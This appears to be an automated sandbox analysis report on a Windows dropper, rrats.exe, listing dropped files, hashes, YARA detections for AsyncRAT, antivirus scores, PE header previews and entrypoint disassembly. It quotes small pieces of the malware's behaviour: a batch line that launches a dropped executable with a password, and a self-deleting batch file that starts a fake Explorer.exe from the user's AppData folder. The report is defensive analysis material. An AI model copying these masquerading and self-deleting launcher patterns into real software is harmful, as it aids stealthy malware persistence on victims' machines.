                                                            Entropy (8bit):5.353683843266035
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                            MD5:859802284B12C59DDBB85B0AC64C08F0
                                                            SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                            SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                            SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\explore.exe.log

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\explore.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):425
                                                            Entropy (8bit):5.353683843266035
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                            MD5:859802284B12C59DDBB85B0AC64C08F0
                                                            SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                            SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                            SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rrat.exe.log

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):522
                                                            Entropy (8bit):5.358731107079437
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat92n4M6:ML9E4KlKDE4KhKiKhg84j
                                                            MD5:AE6AF1A0CB468ECBA64E2D77CB4517DB
                                                            SHA1:09BD6366ED569ADB79274BBAB0BBF09C8244FD97
                                                            SHA-256:3A917DCBC4952EA9A1135B379B56604B3B63198E540C653683D522445258B710
                                                            SHA-512:E578CD0D9BF43FD1BA737B9C44B70130462CE55B4F368E2E341BB94A3A3FFA47D4A9FE714EB86926620D1B4BE9FFF4582C219DF9ACC923C765650B13C5451500
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:Nlllulsp:NllUs
                                                            MD5:45652443D5379363EBB99F8A6B76BAAE
                                                            SHA1:E22A0950AC6456C4A19064AF7F2A857FE06D6E16
                                                            SHA-256:5C5AB7A3B8787F67226287DC84E128A96EBBF98A39D78D71EF00E3CFBAB44005
                                                            SHA-512:9829F8611F0C11964193F33631E5C3CEE870C3C61FAC9AFEA4A8592A4D77CC96CB6CB380F6559422A505BFD7154C1B40FB7924BDC7D88C0DD8FE6F68A2E2C2F9
                                                            Malicious:false
                                                            Preview:@...e...................................;............@..........

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\rrats.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):18
                                                            Entropy (8bit):3.725480556997868
                                                            Encrypted:false
                                                            SSDEEP:3:LjjdHUGR:79UGR
                                                            MD5:CC1BFA4D25DC0D101CFE0A22852E9F00
                                                            SHA1:51C0172AC90F74FA675D96F326C2DF8E85CC35FF
                                                            SHA-256:3276F0CE57358545885AA30B873FA4B604A94689B7528A174D8C9E819873FB08
                                                            SHA-512:D376D38607B12FFE2EDAFEDF4A0C1932C88FE9DB4E0A247D5104140D8DA311A3B752C0D9A52E6048E3247D13EFB3224218F56D276B22F2F26663E05334DE81EC
                                                            Malicious:false
                                                            Preview:start a.exe -p1234

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\rrats.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):308705
                                                            Entropy (8bit):6.919978105053525
                                                            Encrypted:false
                                                            SSDEEP:6144:S61E/QSnxoEMTlXEulocqX+tL7VMxVEosZzW:S6ErxJMTtEul2X+tLxMPEosg
                                                            MD5:7107F3FB53F9F3EAF3B95FD857F7AEE9
                                                            SHA1:81E0DFE67B3B098C331EB3964E670E7762749B40
                                                            SHA-256:3D74CBFD24A606B7F8C1E980CB08365C3127BED66B813F6FC7FB53EB19171CC0
                                                            SHA-512:CD42E3D36A1F0BF7F0429DF7EE0780D1D7039F0139F91E0CB71A488C8D50973DF53FE70A7CDB09E50E5651E2C1A7FEF3DA0A4CB1E9225C5071711BD2D9F2E5D8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........NB. .. .. .S6... .S6..j. .S6.... .F.... .F.$... .F.#.. .F.%.. ..... ..... ..!.. ...%... ... .. ...... ...".. .Rich. .................PE..L..... b.................b.......... B............@.......................................@.........................0...4...d...P...............................x(......T...............................@...............,............................text....a.......b.................. ..`.rdata..............f..............@..@.data...`]...0......................@....didat..`...........................@....rsrc...............................@..@.reloc..x(.......*..................@..B........................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):67584
                                                            Entropy (8bit):5.599686577325716
                                                            Encrypted:false
                                                            SSDEEP:1536:6HDTgTiogco7Uk7u9LbMqDLuMYFYZR4v7vf+:6jTgTiogcq+LbM2CFc8m
                                                            MD5:3D91C31A52BE4E262F7F18272294ED99
                                                            SHA1:7C120A607650348FC4DFCDACDC77BF5885A9E6AC
                                                            SHA-256:B99B28B82C9DA1B009898DA323D4793DDE7828EFCF777A56A835D54CBFEC849D
                                                            SHA-512:D17CC9DB4D263ADDD524BAA7B67974B2D4F0B904F46367CD6138805CD65A8364EA700A9DF147DBB6DAC8B1E7288A87FE24C497E1B1825F49B576E101789856D1
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, Author: ditekSHen
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xc................................. ... ....@.. .......................`............`.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........v...............s.................................................V..;...$0.xC.=VD..b......9A../.\.....{....*"..}....*..{....*"..}....*..{....*"..}....*J.(.....s....}....*2s6....o2...*2.{....o....*.s.........*..(....*.s.........*.(7...*.~....*.......*.~....*.......*.~....*.......*.~ ...*... ...*.~!...*...!...*.~"...*..."...*.~#...*...#...*.~$...*.~%...*...%...*.~&...*...&...*.~'...*...'...**.(B......*2~.....oC...*.s.....$...*jsq...%.oV...%.oW...oX...&*.(>...*.(b...

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0t1rvepx.vir.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cllnkhuo.2zm.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ffmqdsaj.0sx.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixlgf3lw.rla.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndnvu1q1.4up.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pi25ikrw.vmy.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5velkj0.3um.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgjbzir1.23f.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):154
                                                            Entropy (8bit):5.0398316696236245
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDCMNqTtvL5oUkh4EaKC54JBUbmqRDUkh4E2J5xAInTRIKSQjlI7ZPy:hWKqTtT69aZ5UUbmq1923fTrS2Sk
                                                            MD5:BCAA36EF13CD758D6ACA68C3FAE68A36
                                                            SHA1:1890F9E72463041E806111519DBA2D260C3405DA
                                                            SHA-256:E5DA7781104EE5250D657341A74870E28A3741DA0CC5CEB6C2D2998DB5E02807
                                                            SHA-512:B194B50675831BE984BA814ACCC6B081FE3A7B7B2B819195CE5193B8A3DEAD833CB7271E00DF07811FDEF354B91FB8F8531036336DE5ACFECA245D8BB4EB76C5
                                                            Malicious:false
                                                            Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\Explorer.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpE75F.tmp.bat" /f /q..

                                                            C:\Users\user\AppData\Local\explore.exe

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\Explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):67584
                                                            Entropy (8bit):5.599686577325716
                                                            Encrypted:false
                                                            SSDEEP:1536:6HDTgTiogco7Uk7u9LbMqDLuMYFYZR4v7vf+:6jTgTiogcq+LbM2CFc8m
                                                            MD5:3D91C31A52BE4E262F7F18272294ED99
                                                            SHA1:7C120A607650348FC4DFCDACDC77BF5885A9E6AC
                                                            SHA-256:B99B28B82C9DA1B009898DA323D4793DDE7828EFCF777A56A835D54CBFEC849D
                                                            SHA-512:D17CC9DB4D263ADDD524BAA7B67974B2D4F0B904F46367CD6138805CD65A8364EA700A9DF147DBB6DAC8B1E7288A87FE24C497E1B1825F49B576E101789856D1
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\explore.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\explore.exe, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\explore.exe, Author: ditekSHen
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xc................................. ... ....@.. .......................`............`.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........v...............s.................................................V..;...$0.xC.=VD..b......9A../.\.....{....*"..}....*..{....*"..}....*..{....*"..}....*J.(.....s....}....*2s6....o2...*2.{....o....*.s.........*..(....*.s.........*.(7...*.~....*.......*.~....*.......*.~....*.......*.~ ...*... ...*.~!...*...!...*.~"...*..."...*.~#...*...#...*.~$...*.~%...*...%...*.~&...*...&...*.~'...*...'...**.(B......*2~.....oC...*.s.....$...*jsq...%.oV...%.oW...oX...&*.(>...*.(b...

                                                            C:\Users\user\AppData\Roaming\Explorer.exe

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):67584
                                                            Entropy (8bit):5.599686577325716
                                                            Encrypted:false
                                                            SSDEEP:1536:6HDTgTiogco7Uk7u9LbMqDLuMYFYZR4v7vf+:6jTgTiogcq+LbM2CFc8m
                                                            MD5:3D91C31A52BE4E262F7F18272294ED99
                                                            SHA1:7C120A607650348FC4DFCDACDC77BF5885A9E6AC
                                                            SHA-256:B99B28B82C9DA1B009898DA323D4793DDE7828EFCF777A56A835D54CBFEC849D
                                                            SHA-512:D17CC9DB4D263ADDD524BAA7B67974B2D4F0B904F46367CD6138805CD65A8364EA700A9DF147DBB6DAC8B1E7288A87FE24C497E1B1825F49B576E101789856D1
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Explorer.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Explorer.exe, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\Explorer.exe, Author: ditekSHen
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xc................................. ... ....@.. .......................`............`.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........v...............s.................................................V..;...$0.xC.=VD..b......9A../.\.....{....*"..}....*..{....*"..}....*..{....*"..}....*J.(.....s....}....*2s6....o2...*2.{....o....*.s.........*..(....*.s.........*.(7...*.~....*.......*.~....*.......*.~....*.......*.~ ...*... ...*.~!...*...!...*.~"...*..."...*.~#...*...#...*.~$...*.~%...*...%...*.~&...*...&...*.~'...*...'...**.(B......*2~.....oC...*.s.....$...*jsq...%.oV...%.oW...oX...&*.(>...*.(b...

                                                            \Device\Null

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\timeout.exe
                                                            File Type:ASCII text, with CRLF line terminators, with overstriking
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.41440934524794
                                                            Encrypted:false
                                                            SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                            MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                            SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                            SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                            SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                            Malicious:false
                                                            Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.355929597315391
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:rrats.exe
                                                            File size:506'223 bytes
                                                            MD5:a2bdb024c98b7e8d3d06fc86e110d204
                                                            SHA1:2442360d37bf7e60b0d20c447bf5a0b51635a1d4
                                                            SHA256:72cd6d490f03122c90b4a52c8bc7fb5b938123eaf4926b5cc5cee14f44bef3cf
                                                            SHA512:b60afa45e29ddee3e3dc0d7e61bd5b9f3fb1d0c03a0655ab8f6c80b1fc5d6ff51f1b07a1af7ab1ce28d373f990d830f2f1c6e3c0e1efbaa280361a250ecb6850
                                                            SSDEEP:6144:rTouKrWBEu3/Z2lpGDHU3ykJVX+tLC/Jm808PYfz1b8s4GYAMwX:rToPWBv/cpGrU3yUX+tLGA8mJbV2o
                                                            TLSH:7EB4E0027AC188B2D0631D325A796B21A93DBD202F75CEEF63D42A6DDA316C0D735772
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                            File Icon

                                                            Icon Hash:1515d4d4442f2d2d

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x41f530
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007F5678C2ABDBh
                                                            jmp 00007F5678C2A4EDh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            push dword ptr [ebp+08h]
                                                            mov esi, ecx
                                                            call 00007F5678C1D337h
                                                            mov dword ptr [esi], 004356D0h
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            and dword ptr [ecx+04h], 00000000h
                                                            mov eax, ecx
                                                            and dword ptr [ecx+08h], 00000000h
                                                            mov dword ptr [ecx+04h], 004356D8h
                                                            mov dword ptr [ecx], 004356D0h
                                                            ret
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            mov esi, ecx
                                                            lea eax, dword ptr [esi+04h]
                                                            mov dword ptr [esi], 004356B8h
                                                            push eax
                                                            call 00007F5678C2D97Fh
                                                            test byte ptr [ebp+08h], 00000001h
                                                            pop ecx
                                                            je 00007F5678C2A67Ch
                                                            push 0000000Ch
                                                            push esi
                                                            call 00007F5678C29C39h
                                                            pop ecx
                                                            pop ecx
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007F5678C1D2B2h
                                                            push 0043BEF0h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007F5678C2D439h
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007F5678C2A5F8h
                                                            push 0043C0F4h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007F5678C2D41Ch
                                                            int3
                                                            jmp 00007F5678C2EEB7h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push 00422900h
                                                            push dword ptr fs:[00000000h]

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xe51f.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x730000x233c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
